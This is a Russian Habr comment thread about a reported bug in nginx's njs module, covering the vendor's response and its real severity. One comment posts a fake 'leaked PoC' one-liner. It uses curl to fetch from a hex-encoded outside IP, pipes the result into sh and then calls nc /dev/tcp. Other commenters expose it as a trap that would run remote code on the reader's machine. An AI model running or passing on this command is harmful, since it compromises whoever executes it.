Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 24
Вот сейчас страшно. Рце в нжингсе и если пок реален и прост, будет весело.
Если опубликуют подробности будет в любом случае весело, ведь сколько не обновлённых инстансов останется.
Если в статье речь исключительно о 1.16-1.17, то риску подвержены только недавние инсталляции.
Он же open source, в каком-нибудь коммите засветится.
не обновленных инстансов, докер-контейнеров, которые даже обновлять-то никто не подумает. волосы реально шевелятся. нас ждут увлекательные истории после публикации деталей
NGINX
Replying to alisaesage
Thank you Alisa and ZDI for the report.
ZDI-CAN-8296 & ZDI-CAN-8495 are tracked as t.co/NhLhrM26cJ and t.co/2wVIv6rN0N ZDI-CAN-8296 was fixed in the nJS 0.3.2 release, and ZDI-CAN-8495 will be fixed in 0.3.3. Neither bug appears to be generally exploitable.
Replying to alisaesage
Thank you Alisa and ZDI for the report.
ZDI-CAN-8296 & ZDI-CAN-8495 are tracked as t.co/NhLhrM26cJ and t.co/2wVIv6rN0N ZDI-CAN-8296 was fixed in the nJS 0.3.2 release, and ZDI-CAN-8495 will be fixed in 0.3.3. Neither bug appears to be generally exploitable.
CVSS Base Score понизили с 8.1 до 7.4 и Attack Vector сменили на Local.
Это касается модуля njs. Так что, не очень-то и страшно.
Интересно, насолько этот модуль популярен.
Интересно, насолько этот модуль популярен.
она давно зарекомендовала себя как отличный специалист (и даже находится в санкционном списке)
Поясните, плз, как между собой коррелируют эти два факта и о каком списке идёт речь?
Всем боятся 3 недели) "Алисе" респект.
Не nginx, а njs, не уязвимость, а просто баг (уже пофикшен в последней версии) — компания Nginx отписалась, что этот баг не может быть использован как уязвимость.
Вообщем шум не очем.
Вообщем шум не очем.
Утекло. Не проверял
LEAKED: nginx 1.x PoC on-liner. Null-byte RCE overflow in nginx BLT/Stream
curl -gsS victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
На первый взгляд похоже на f6234460852a в njs.
Я бы убрал
|sh; nc /dev/tcp/localhost, иначе «PoC» может сработать даже если на сервере жертвы не установлен nginx (причём сервер жертвы, явно не удалённая машина).
curl 0x0238f06a
Забавно, чего только в линукс не вкручивают.
В Windows тоже работает:
Да и в браузере тоже:
C:\Windows\System32>ping 0x0238f06a
Pinging 2.56.240.106 with 32 bytes of data:
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56
Reply from 2.56.240.106: bytes=32 time=97ms TTL=56Да и в браузере тоже:
http://0x0238f06a/
Так толсто, что прям тонко
nginx — это же вроде бы опенсорс? Какой смысл в 90-дневном неразглашении, если после выхода патча всё станет ясно?
Так значит в самом nginx нет уязвимости, и если не используешь этот модуль, можно срочно все не обновлять?
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
updated: Zero-Click Server-Side RCE в njs